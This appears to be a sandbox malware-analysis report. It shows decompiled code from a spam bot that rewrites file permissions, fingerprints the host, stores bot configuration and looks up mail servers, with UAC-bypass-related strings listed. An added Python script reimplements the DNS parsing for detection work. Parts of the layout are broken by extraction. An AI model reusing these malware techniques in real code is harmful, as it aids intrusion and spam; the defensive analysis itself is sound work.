   current user's SID (~_a8 & 0x90046) + 0x1601b9, i.e. 0x1601b9 when _a8
   is all ones and up to 0x1f01ff when _a8 is zero) together with the ACE
   type/flags, and writes the modified DACL back with SetFileSecurityA.
   Returns 1 when the file owner differs from the current user or the
   DACL was changed, 0 otherwise. _t156 is the frame base the decompiler
   used for the on-stack array of already-seen SID pointers (ebp - 0xfc). */
E00407809(CHAR* _a4, signed int _a8) {
    signed int _v8;
    void* _v12;
    void* _v16;
    struct _ACL* _v20;
    signed int _v24;
    int _v28;
    long _v32;
    long _v36;
    long _v40;
    long _v44;
    int _v48;
    int _v52;
    union _SID_NAME_USE _v56;
    int _v60;
    void _v128;
    char _v384;
    char _v512;
    struct _SECURITY_DESCRIPTOR _v1536;
    intOrPtr* _t66;
    struct _ACL* _t110;
    int _t120;
    intOrPtr _t121;
    signed int _t123;
    signed int _t141;
    char* _t146;
    signed int _t153;
    void* _t154;
    void* _t155;
    void* _t156;

    _t141 = 0;
    _v28 = 0;
    _v20 = 0;
    _v36 = 0x80;
    if(GetUserNameA( &_v384,  &_v36) == 0) {
        L42:
        return _v28;
    }
    _v32 = 0x44;
    _v40 = 0x80;
    if(LookupAccountNameA(0,  &_v384,  &_v128,  &_v32,  &_v512,  &_v40,  &_v56) == 0) {
        goto L42;
    }
    _v32 = GetLengthSid( &_v128);
    _v44 = 0x400;
    if(GetFileSecurityA(_a4, 5,  &_v1536, 0x400,  &_v44) == 0) {
        goto L42;
    } else {
        if(GetSecurityDescriptorOwner( &_v1536,  &_v16,  &_v48) != 0) {
            _v36 = 0x80;
            _v40 = 0x80;
            if(EqualSid( &_v128, _v16) == 0) {
                _v28 = 1;
                _t155 = LocalAlloc(0x40, 0x14);
                if(_t155 != 0) {
                    LocalFree(_t155);
                }
            }
        }
        _v24 = _t141;
        if(GetSecurityDescriptorDacl( &_v1536,  &_v60,  &_v20,  &_v52) == 0) {
            L41:
            goto L42;
        }
        _t110 = _v20;
        if(_t110 == _t141) {
            goto L41;
        }
        _v8 = _v8 & _t141;
        if(0 >= _t110->AceCount) {
            goto L41;
        } else {
            goto L13;
        }
        do {
            L13:
            if(GetAce(_t110, _v8,  &_v12) == 0) {
                L32:
                _v8 = _v8 + 1;
                goto L33;
            }
            _t153 = 0;
            _v16 = _v12 + 8;
            if(_t141 <= 0) {
                L19:
                if(_t141 < 0x20) {
                     *((intOrPtr*)(_t156 + _t141 * 4 - 0xfc)) = _v16;
                    _t141 = _t141 + 1;
                }
                _t120 = EqualSid( &_v128, _v16);
                _t146 = _v12;
                if(_t120 == 0) {
                    _t121 = 0x1200a8;
                } else {
                    asm("sbb eax, eax");
                    _t121 = ( ~_a8 & 0x00090046) + 0x1601b9;
                }
                if( *((intOrPtr*)(_t146 + 4)) != _t121) {
                     *((intOrPtr*)(_t146 + 4)) = _t121;
                    _t146 = _v12;
                    _v24 = 1;
                }
                if( *_t146 != 0 || ( *(_t146 + 1) & 0x00000010) != 0) {
                     *_t146 = 0;
                    _t66 = _v16 + 8; // 0xc8685f74
                    _t123 =  *_t66;
                    if(_t123 != 0) {
                         *((char*)(_v12 + 1)) = (_t123 & 0xffffff00 | _t123 - 0x00000050 > 0x00000000) + 2;
                    } else {
                         *((char*)(_v12 + 1)) = 0xb;
                    }
                    _v24 = 1;
                }
                goto L32;
            }
            while(EqualSid( *(_t156 + _t153 * 4 - 0xfc), _v16) == 0) {
                _t153 = _t153 + 1;
                if(_t153 < _t141) {
                    continue;
                }
                break;
            }
            if(_t153 >= _t141) {
                goto L19;
            }
            DeleteAce(_v20, _v8);
            _v24 = 1;
            L33:
            _t110 = _v20;
        } while (_v8 < (_t110->AceCount & 0x0000ffff));
        if(_v24 != 0) {
            _v28 = 1;
            _t154 = LocalAlloc(0x40, 0x14);
            if(_t154 != 0) {
                if(InitializeSecurityDescriptor(_t154, 1) != 0 && SetSecurityDescriptorDacl(_t154, 1, _v20, 0) != 0 && SetFileSecurityA(_a4, 4, _t154) != 0) {
                    _v28 = 1;
                }
                LocalFree(_t154);
            }
        }
        goto L41;
    }
}
                                                                                                                                  0x00407a10
                                                                                                                                  0x00407a13
                                                                                                                                  0x00407a13
                                                                                                                                  0x00407a27
                                                                                                                                  0x00407a27
                                                                                                                                  0x00000000
                                                                                                                                  0x004079fb
                                                                                                                                  0x00407980
                                                                                                                                  0x00407994
                                                                                                                                  0x00407997
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407997
                                                                                                                                  0x0040799b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004079a3
                                                                                                                                  0x004079a9
                                                                                                                                  0x00407a2d
                                                                                                                                  0x00407a2d
                                                                                                                                  0x00407a34
                                                                                                                                  0x00407a41
                                                                                                                                  0x00407a47
                                                                                                                                  0x00407a50
                                                                                                                                  0x00407a54
                                                                                                                                  0x00407a60
                                                                                                                                  0x00407a83
                                                                                                                                  0x00407a83
                                                                                                                                  0x00407a87
                                                                                                                                  0x00407a87
                                                                                                                                  0x00407a54
                                                                                                                                  0x00000000
                                                                                                                                  0x00407a41

APIs
• GetUserNameA.ADVAPI32(?,?), ref: 0040782F
• LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00407866
• GetLengthSid.ADVAPI32(?), ref: 00407878
• GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 0040789A
• GetSecurityDescriptorOwner.ADVAPI32(?,00407F63,?), ref: 004078B8
• EqualSid.ADVAPI32(?,00407F63), ref: 004078D2
• LocalAlloc.KERNEL32(00000040,00000014), ref: 004078E3
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 004078F1
• SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407901
• SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00407910
• LocalFree.KERNEL32(00000000), ref: 00407917
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00407933
• GetAce.ADVAPI32(?,00000000,?), ref: 00407963
• EqualSid.ADVAPI32(?,00407F63), ref: 0040798A
• DeleteAce.ADVAPI32(?,00000000), ref: 004079A3
• EqualSid.ADVAPI32(?,00407F63), ref: 004079C5
• LocalAlloc.KERNEL32(00000040,00000014), ref: 00407A4A
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407A58
• SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00407A69
• SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00407A79
• LocalFree.KERNEL32(00000000), ref: 00407A87
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
• String ID: D
• API String ID: 3722657555-2746444292
• Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
• Instruction ID: df0c13f2d89176358eaf39038022480abc221899387876bf5e0f356ce13a0778
• Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
• Instruction Fuzzy Hash: 59813C71E04119ABDB11CFA5DD44FEFBBB8AB08340F14817AE505F6290D739AA41CF69
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 95%
E00401D96(void* __ecx, intOrPtr* _a4) {
	struct _OSVERSIONINFOA _v156;
	struct _SYSTEM_INFO _v192;
	char _v196;
	intOrPtr _v200;
	intOrPtr _t59;
	signed int _t61;
	signed int _t63;
	void* _t65;
	intOrPtr _t66;
	intOrPtr _t67;
	signed int _t71;
	intOrPtr _t93;
	intOrPtr _t96;
	intOrPtr _t97;
	intOrPtr _t102;
	intOrPtr* _t103;
	intOrPtr* _t105;
	void* _t109;
	void* _t110;
	void* _t111;
	void* _t112;
	void* _t113;
	void* _t114;

	_t105 = _a4;
	_t102 = 0x64;
	E0040EE2A(__ecx, _t105, 0, _t102);
	_t109 =  &_v200 + 0xc;
	 *_t105 = _t102;
	/* sizeof(OSVERSIONINFOA) == 0x9c; the OS version is packed into one byte at +0x41 (major in the high nibble, minor in the low nibble) */
	_v156.dwOSVersionInfoSize = 0x9c;
	if(GetVersionExA( &_v156) == 0) {
		 *((char*)(_t105 + 0x41)) = 0;
	} else {
		 *((char*)(_t105 + 0x41)) = (_v156.dwMajorVersion << 4) + _v156.dwMinorVersion;
	}
	GetSystemInfo( &_v192);
	 *((char*)(_t105 + 0x3f)) = _v192.dwNumberOfProcessors;
	/* IsWow64Process is resolved at run time so the binary still loads on systems without it; _v196 becomes non-zero for a 32-bit process on 64-bit Windows */
	_v196 = 0;
	_t103 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
	if(_t103 != 0) {
		 *_t103(GetCurrentProcess(),  &_v196);
	}
	_t104 = "localcfg";
	 *((char*)(_t105 + 0x40)) = 2;
	_t59 = E0040E819(1, "localcfg", "lid_file_upd", 0);
	_t92 = "flags_upd";
	 *((intOrPtr*)(_t105 + 0x24)) = _t59;
	 *(_t105 + 4) =  *(_t105 + 4) | E0040E819(1, "localcfg", "flags_upd", 0);
	_t61 =  *(_t105 + 4);
	_t110 = _t109 + 0x20;
	if((_t61 & 0x00000008) != 0) {
		 *(_t105 + 4) = _t61 & 0xfffffff7;
		E0040DF70(1, "work_srv");
		E0040DF70(1, "start_srv");
		_t110 = _t110 + 0x10;
	}
	E0040EA84(1, _t104, _t92, 0);
	_t93 = 0;
	_t63 = E0040E819(1, _t104, "net_type", 0);
	_t111 = _t110 + 0x20;
	 *(_t105 + 0x14) = _t63;
	if(E0040199C(_t63) == 0) {
		 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000010;
	} else {
		 *(_t105 + 0x14) =  *(_t105 + 0x14) | 0x00000020;
	}
	/* "born_date" is created on first run if it is absent, so later runs keep the original value */
	_t65 = E0040E819(1, _t104, "born_date", _t93);
	_t112 = _t111 + 0x10;
	 *((intOrPtr*)(_t105 + 0x30)) = _t93;
	if(_t65 == _t93) {
		_t97 = E0040F04E(_t93);
		E0040EA84(1, _t104, "born_date", _t97);
		_t112 = _t112 + 0x14;
		 *((intOrPtr*)(_t105 + 0x30)) = _t97;
		_t93 = 0;
	}
	_t94 = "id";
	_t66 = E0040E819(1, _t104, "id", _t93);
	_t113 = _t112 + 0x10;
	 *((intOrPtr*)(_t105 + 0xc)) = _t66;
	if(_t66 == 0) {
		_v200 = E00401B71();
		E0040EA84(1, _t104, _t94, _t77);
		_t113 = _t113 + 0x10;
		 *((intOrPtr*)(_t105 + 0xc)) = _v200;
	}
	_t95 = "hi_id";
	_t67 = E0040E819(1, _t104, "hi_id", 0);
	_t114 = _t113 + 0x10;
	 *((intOrPtr*)(_t105 + 0x10)) = _t67;
	if(_t67 == 0) {
		_v200 = E00401BDF();
		E0040EA84(1, _t104, _t95, _t74);
		_t114 = _t114 + 0x10;
		 *((intOrPtr*)(_t105 + 0x10)) = _v200;
	}
	 *((intOrPtr*)(_t105 + 8)) = 0x5e;
	_t96 = E0040E819(1, _t104, "loader_id", 0);
	if(_t96 == 0) {
		_t96 = 0xd;
		E0040EA84(1, _t104, "loader_id", _t96);
	}
	 *((intOrPtr*)(_t105 + 0x1c)) = _t96;
	 *((intOrPtr*)(_t105 + 0x34)) = E004030B5();
	if( *0x41201d == 0) {
		if( *0x41201f == 0) {
			 *(_t105 + 0x18) =  *(_t105 + 0x18) & 0x00000000;
		} else {
			if(E00406EC3() != 0) {
				 *(_t105 + 0x18) = 2;
			} else {
				 *(_t105 + 0x18) = 0x10;
			}
		}
	} else {
		 *(_t105 + 0x18) = 1;
	}
	/* bit 0x200 of the flags word at +0x18 records the WoW64 result from above */
	if(_v196 != 0) {
		 *(_t105 + 0x18) =  *(_t105 + 0x18) | 0x00000200;
	}
	/* GetTickCount() / 1000: system uptime in seconds, kept both in a global and in the structure */
	_t71 = GetTickCount() / 0x3e8;
	 *0x412110 = _t71;
	 *(_t105 + 0x28) = _t71;
	return _t71;
}


























Disassembly listing for this function (addresses 0x00401d9f to 0x00401fea; only the address column survived extraction, the instruction text is not present on the page)

APIs
• GetVersionExA.KERNEL32 ref: 00401DC6
• GetSystemInfo.KERNEL32(?), ref: 00401DE8
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 00401E03
• GetProcAddress.KERNEL32(00000000), ref: 00401E0A
• GetCurrentProcess.KERNEL32(?), ref: 00401E1B
• GetTickCount.KERNEL32 ref: 00401FC9
  • Part of subcall function 00401BDF: GetComputerNameA.KERNEL32 ref: 00401C15
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
• String ID: 0 v$IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
• API String ID: 4207808166-1853734742
• Opcode ID: 857587d66ef5407bd9f823cee7786aca052e01b20ac6ebc7d69f7416010c46cb
• Instruction ID: cd5e56fee8dacda117f2c3378b491c5a2df23dd5de729853a430aab3da097112
• Opcode Fuzzy Hash: 857587d66ef5407bd9f823cee7786aca052e01b20ac6ebc7d69f7416010c46cb
• Instruction Fuzzy Hash: 2551EA705043446FD330AF768C85F67BAECEB84708F00493FF955A2292D7BDA94487A9
Uniqueness

Uniqueness Score: -1.00%

APIs
• ShellExecuteExW.SHELL32(?), ref: 0040139A
• lstrlenW.KERNEL32(-00000003), ref: 00401571
Strings
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: ExecuteShelllstrlen
• String ID: $%systemroot%\system32\cmd.exe$<$@$D$uac$useless$wusa.exe
• API String ID: 1628651668-1839596206
• Opcode ID: ab4c75885172d034ed3803886c8c211ded8e4a09802339f18fb7352a61972d3c
• Instruction ID: 915494465e6448ea0d8334ed2feda226c725056e28db06d0983f622db304c09c
• Opcode Fuzzy Hash: ab4c75885172d034ed3803886c8c211ded8e4a09802339f18fb7352a61972d3c
• Instruction Fuzzy Hash: E5F19FB55083419FD720DF64C888BABB7E5FB88304F10892EF596A73A0D778D944CB5A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 53%
E00402A62(void* __ecx, intOrPtr* _a12) {
	intOrPtr _v8;
	intOrPtr _v12;
	intOrPtr* _v44;
	signed short _v272;
	char _v276;
	long _v280;
	char _v284;
	signed short _v288;
	signed short _v292;
	long _v300;
	long _v304;
	intOrPtr _v308;
	signed short _v324;
	intOrPtr _v332;
	signed short _v336;
	signed int _v340;
	signed int _v344;
	void* _v348;
	signed short _v352;
	signed short _v356;
	void* __ebx;
	void* __edi;
	void* __esi;
	intOrPtr _t53;
	signed short _t66;
	void** _t71;
	void* _t76;
	void* _t77;
	void* _t78;
	signed short _t79;
	intOrPtr* _t81;
	signed short _t82;
	signed short _t83;
	intOrPtr _t86;
	signed int _t88;
	void* _t90;
	long _t91;
	signed short _t92;
	void* _t94;

	_t77 = __ecx;
	_t91 = 0;
	 *_a12 = 1;
	_t50 = HeapAlloc(GetProcessHeap(), 0, 0x1000);
	_t76 = _t50;
	if(_t76 != 0) {
		__imp__#23(2, 2, 0x11, _t78);
		_t79 = _t50;
		_v288 = _t79;
		if(_t79 == 0 || _t79 == 0xffffffff) {
			HeapFree(GetProcessHeap(), _t91, _t76);
			_t53 = 0;
			goto L37;
		} else {
			_v304 = 0;
			while(1) {
				_v300 = _t91;
				if(_v304 != _t91) {
					_push(_t91);
				} else {
					_push(0x100);
				}
				__imp__#9();
                                                                                                                                  							_t50 = E004026FF(_v8, _t79, _v12, _t50 & 0x0000ffff);
                                                                                                                                  							_t94 = _t94 + 0xc;
                                                                                                                                  							if(_t50 != 0) {
                                                                                                                                  								goto L32;
                                                                                                                                  							}
                                                                                                                                  							_t86 = 0xc;
                                                                                                                                  							_t50 =  &_v276;
                                                                                                                                  							_v272 = _t79;
                                                                                                                                  							_v276 = 1;
                                                                                                                                  							_v284 = _t86;
                                                                                                                                  							_v280 = _t91;
                                                                                                                                  							__imp__#18(_t91, _t50, _t91, _t91,  &_v284);
                                                                                                                                  							if(_t50 <= 0) {
                                                                                                                                  								goto L32;
                                                                                                                                  							}
                                                                                                                                  							_t50 = E0040EE2A(_t77, _t76, _t91, 4);
                                                                                                                                  							_t94 = _t94 + 0xc;
                                                                                                                                  							__imp__#16(_t79, _t76, 0x1000, _t91);
                                                                                                                                  							_t92 = _t50;
                                                                                                                                  							_v324 = _t92;
                                                                                                                                  							if(_t92 > 0 && _t92 > _t86) {
                                                                                                                                  								_t81 = __imp__#15;
                                                                                                                                  								_t88 =  *_t81( *(_t76 + 2) & 0x0000ffff) & 0xf;
                                                                                                                                  								if(_t88 == 3) {
                                                                                                                                  									L34:
                                                                                                                                  									 *_v44 = 2;
                                                                                                                                  									L35:
                                                                                                                                  									HeapFree(GetProcessHeap(), 0, _t76);
                                                                                                                                  									__imp__#3(_v292);
                                                                                                                                  									_t53 = _v308;
                                                                                                                                  									L37:
                                                                                                                                  									return _t53;
                                                                                                                                  								}
                                                                                                                                  								if(_t88 != 2) {
                                                                                                                                  									L16:
                                                                                                                                  									if(_t88 != 0) {
                                                                                                                                  										goto L32;
                                                                                                                                  									}
                                                                                                                                  									_t50 = E00402923(_t77, _t76, _t92);
                                                                                                                                  									_pop(_t77);
                                                                                                                                  									_v336 = _t50;
                                                                                                                                  									if(_t50 == 0) {
                                                                                                                                  										goto L32;
                                                                                                                                  									}
                                                                                                                                  									_v340 = _v340 & 0x00000000;
                                                                                                                                  									_v344 = _v344 & 0x00000000;
                                                                                                                                  									_t82 = _t50;
                                                                                                                                  									_v352 = _t82;
                                                                                                                                  									L20:
                                                                                                                                  									while(1) {
                                                                                                                                  										if( *((short*)(_t82 + 0x10a)) != 1 ||  *((short*)(_t82 + 0x108)) != 0xf ||  *((short*)(_t82 + 0x10c)) < 3) {
                                                                                                                                  											L30:
                                                                                                                                  											_t83 =  *_t82;
                                                                                                                                  											_v352 = _t83;
                                                                                                                                  											if(_t83 != 0) {
                                                                                                                                  												_t82 = _v352;
                                                                                                                                  												continue;
                                                                                                                                  											}
                                                                                                                                  											goto L31;
                                                                                                                                  										} else {
                                                                                                                                  											_t90 = HeapAlloc(GetProcessHeap(), 0, 0x108);
                                                                                                                                  											if(_t90 == 0) {
                                                                                                                                  												L31:
                                                                                                                                  												_t50 = E00402904(_v336);
                                                                                                                                  												if(_v344 != 0) {
                                                                                                                                  													goto L35;
                                                                                                                                  												}
                                                                                                                                  												goto L32;
                                                                                                                                  											}
                                                                                                                                  											E0040EE2A(_t77, _t90, 0, 0x108);
                                                                                                                                  											_t66 =  *( *((intOrPtr*)(_t82 + 0x110)) + _t76) & 0x0000ffff;
                                                                                                                                  											_t94 = _t94 + 0xc;
                                                                                                                                  											__imp__#15();
                                                                                                                                  											 *(_t90 + 4) = _t66 & 0x0000ffff;
                                                                                                                                  											_t33 = _t90 + 8; // 0x8
                                                                                                                                  											E00402871( *((intOrPtr*)(_t82 + 0x110)) + 2, _t76, _t77, _t33, _v332);
                                                                                                                                  											_t77 = _t66;
                                                                                                                                  											if( *((char*)(_t90 + 8)) != 0) {
                                                                                                                                  												_t71 = _v344;
                                                                                                                                  												_v344 = _t90;
                                                                                                                                  												if(_t71 != 0) {
                                                                                                                                  													 *_t71 = _t90;
                                                                                                                                  												} else {
                                                                                                                                  													_v348 = _t90;
                                                                                                                                  												}
                                                                                                                                  											} else {
                                                                                                                                  												HeapFree(GetProcessHeap(), 0, _t90);
                                                                                                                                  											}
                                                                                                                                  											_t82 = _v356;
                                                                                                                                  											goto L30;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  								_push( *(_t76 + 2) & 0x0000ffff);
                                                                                                                                  								if( *_t81() < 0) {
                                                                                                                                  									goto L34;
                                                                                                                                  								}
                                                                                                                                  								goto L16;
                                                                                                                                  							}
                                                                                                                                  							L32:
                                                                                                                                  							_v308 = _v308 + 1;
                                                                                                                                  							if(_v308 < 2) {
                                                                                                                                  								_t79 = _v292;
                                                                                                                                  								_t91 = 0;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							goto L35;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return 0;
                                                                                                                                  			}










































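The routine above is a UDP DNS MX lookup: the imported ordinals are ws2_32!socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP), select with a 12 second timeout, recv into a 0x1000-byte buffer, and ntohs on the flags word at offset 2, whose low four bits are the RCODE. The following Python is an added analyst reimplementation of the response handling, not code from the sample or from Joe Sandbox. It mirrors the observable decisions: a reply of 12 bytes or less is ignored, RCODE 3 (NXDOMAIN) stops the lookup, RCODE 2 (SERVFAIL) stops it only when the QR bit is set and otherwise causes a retry like any other non-zero RCODE, and answer records are kept only when TYPE is 15 (MX), CLASS is 1 (IN) and RDLENGTH is at least 3, with the 16-bit preference read from the start of RDATA and the exchange name decoded after it. The reading of the record fields at +0x108/+0x10a/+0x10c as TYPE/CLASS/RDLENGTH, and of E00402923 and E00402871 as record parser and name decoder, is an assumption, since those bodies are not in this listing. The query and the server reply are constructed in-process with hypothetical hostnames so the script runs offline.

```python
"""DNS MX response handling as performed by the decompiled routine above.
Analyst reimplementation (not the sample's own code); the response is
constructed in-process with hypothetical names so it runs offline."""
import struct

TYPE_MX, CLASS_IN = 15, 1
RCODE_OK, RCODE_SERVFAIL, RCODE_NXDOMAIN = 0, 2, 3


def encode_name(name: str) -> bytes:
    """Wire-format name: length-prefixed labels terminated by a zero byte."""
    labels = [lbl for lbl in name.rstrip(".").split(".") if lbl]
    return b"".join(bytes([len(lbl)]) + lbl.encode("ascii") for lbl in labels) + b"\x00"


def build_mx_query(name: str, txid: int = 0x1234) -> bytes:
    """Standard query header (RD set) plus one MX/IN question."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", TYPE_MX, CLASS_IN)


def build_mx_response(query: bytes, answers, rcode: int = RCODE_OK, ttl: int = 300) -> bytes:
    """Constructed server reply: echoes the question; answers point back to it with 0xC00C."""
    txid = struct.unpack(">H", query[:2])[0]
    flags = 0x8180 | rcode                      # QR=1, RD=1, RA=1
    header = struct.pack(">HHHHHH", txid, flags, 1, len(answers), 0, 0)
    body = query[12:]
    for pref, exchange in answers:
        rdata = struct.pack(">H", pref) + encode_name(exchange)
        body += b"\xc0\x0c" + struct.pack(">HHIH", TYPE_MX, CLASS_IN, ttl, len(rdata)) + rdata
    return header + body


def read_name(pkt: bytes, off: int):
    """Decode a possibly compressed name; return (name, offset just past it in the record)."""
    labels, end, hops = [], None, 0
    while True:
        ln = pkt[off]
        if ln & 0xC0 == 0xC0:                   # compression pointer
            if end is None:
                end = off + 2
            off = struct.unpack(">H", pkt[off:off + 2])[0] & 0x3FFF
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            continue
        off += 1
        if ln == 0:
            break
        labels.append(pkt[off:off + ln].decode("ascii"))
        off += ln
    return ".".join(labels), (end if end is not None else off)


def parse_mx_response(pkt: bytes):
    """Mirror the sample's decisions; returns (outcome, sorted [(preference, exchange)])."""
    if len(pkt) <= 12:
        return "short", []                      # sample requires more than the 12-byte header
    txid, flags, qd, an, ns, ar = struct.unpack(">HHHHHH", pkt[:12])
    rcode = flags & 0xF                         # low 4 bits of the flags word at offset 2
    qr_set = bool(flags & 0x8000)               # ntohs(flags) < 0 as a signed short
    if rcode == RCODE_NXDOMAIN or (rcode == RCODE_SERVFAIL and qr_set):
        return "stop", []                       # sample writes 2 to its status word and stops
    if rcode != RCODE_OK:
        return "retry", []                      # sample loops once more (retry counter < 2)
    off = 12
    for _ in range(qd):
        _, off = read_name(pkt, off)
        off += 4                                # QTYPE + QCLASS
    hosts = []
    for _ in range(an):
        _, off = read_name(pkt, off)
        rtype, rclass, ttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
        off += 10
        if rtype == TYPE_MX and rclass == CLASS_IN and rdlen >= 3:
            pref = struct.unpack(">H", pkt[off:off + 2])[0]   # first word of RDATA
            exchange, _ = read_name(pkt, off + 2)             # name decoded after it
            if exchange:                        # sample drops nodes whose name is empty
                hosts.append((pref, exchange))
        off += rdlen
    return "ok", sorted(hosts)


if __name__ == "__main__":
    q = build_mx_query("example.test")
    print(parse_mx_response(build_mx_response(q, [(20, "mx2.example.test"), (10, "mx1.example.test")])))
    print(parse_mx_response(build_mx_response(q, [], rcode=RCODE_NXDOMAIN)))
```

For detection work, the useful takeaways are the constants the bot hard-codes rather than the DNS logic itself: a 12 second select timeout, a 0x1000-byte receive buffer, a single retry, and MX-only filtering, which is the lookup pattern a spam engine needs to find the mail exchangers of its target domains.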
Statement addresses of this function (the per-line address column of the listing above, detached during extraction; 0x00000000 placeholder entries dropped; the function body spans 0x00402a62 to 0x00402ce0): 0x00402a62, 0x00402a7a, 0x00402a7d, 0x00402a86, 0x00402a8c, 0x00402a90, 0x00402aa0, 0x00402aa6, 0x00402aa8, 0x00402aae, 0x00402cd8, 0x00402cde, 0x00402abd, 0x00402abd, 0x00402ac9, 0x00402ac9, 0x00402ad1, 0x00402ada, 0x00402ad3, 0x00402ad3, 0x00402ad3, 0x00402adb, 0x00402af4, 0x00402af9, 0x00402afe, 0x00402b06, 0x00402b0e, 0x00402b14, 0x00402b18, 0x00402b20, 0x00402b24, 0x00402b28, 0x00402b30, 0x00402b3a, 0x00402b3f, 0x00402b4a, 0x00402b50, 0x00402b52, 0x00402b58, 0x00402b6a, 0x00402b76, 0x00402b7c, 0x00402ca6, 0x00402cad, 0x00402cb3, 0x00402cbd, 0x00402cc7, 0x00402ccd, 0x00402ce0, 0x00402ce0, 0x00402b85, 0x00402b96, 0x00402b98, 0x00402ba1, 0x00402ba6, 0x00402ba7, 0x00402bad, 0x00402bb3, 0x00402bb8, 0x00402bbd, 0x00402bbf, 0x00402bc9, 0x00402bd1, 0x00402c77, 0x00402c77, 0x00402c79, 0x00402c7f, 0x00402bc5, 0x00402bc5, 0x00402bf3, 0x00402c08, 0x00402c0c, 0x00402c85, 0x00402c89, 0x00402c93, 0x00402c93, 0x00402c12, 0x00402c1d, 0x00402c21, 0x00402c25, 0x00402c32, 0x00402c3e, 0x00402c41, 0x00402c4a, 0x00402c4b, 0x00402c5f, 0x00402c63, 0x00402c69
                                                                                                                                  0x00402c71
                                                                                                                                  0x00402c6b
                                                                                                                                  0x00402c6b
                                                                                                                                  0x00402c6b
                                                                                                                                  0x00402c4d
                                                                                                                                  0x00402c57
                                                                                                                                  0x00402c57
                                                                                                                                  0x00402c73
                                                                                                                                  0x00000000
                                                                                                                                  0x00402c73
                                                                                                                                  0x00402bd1
                                                                                                                                  0x00402bc9
                                                                                                                                  0x00402b8b
                                                                                                                                  0x00402b90
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402b90
                                                                                                                                  0x00402c95
                                                                                                                                  0x00402c95
                                                                                                                                  0x00402c9e
                                                                                                                                  0x00402ac3
                                                                                                                                  0x00402ac7
                                                                                                                                  0x00000000
                                                                                                                                  0x00402ac7
                                                                                                                                  0x00000000
                                                                                                                                  0x00402ca4
                                                                                                                                  0x00402ac9
                                                                                                                                  0x00402aae
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,761B4F20), ref: 00402A83
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,761B4F20), ref: 00402A86
                                                                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 00402AA0
                                                                                                                                  • htons.WS2_32(00000000), ref: 00402ADB
                                                                                                                                  • select.WS2_32 ref: 00402B28
                                                                                                                                  • recv.WS2_32(?,00000000,00001000,00000000), ref: 00402B4A
                                                                                                                                  • htons.WS2_32(?), ref: 00402B71
                                                                                                                                  • htons.WS2_32(?), ref: 00402B8C
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000108), ref: 00402BFB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heaphtons$Process$Allocrecvselectsocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1639031587-0
                                                                                                                                  • Opcode ID: 72f5f8f4b8a6e38625c08c3a78b0cfce54e590fe4137906a5456ad4f28646144
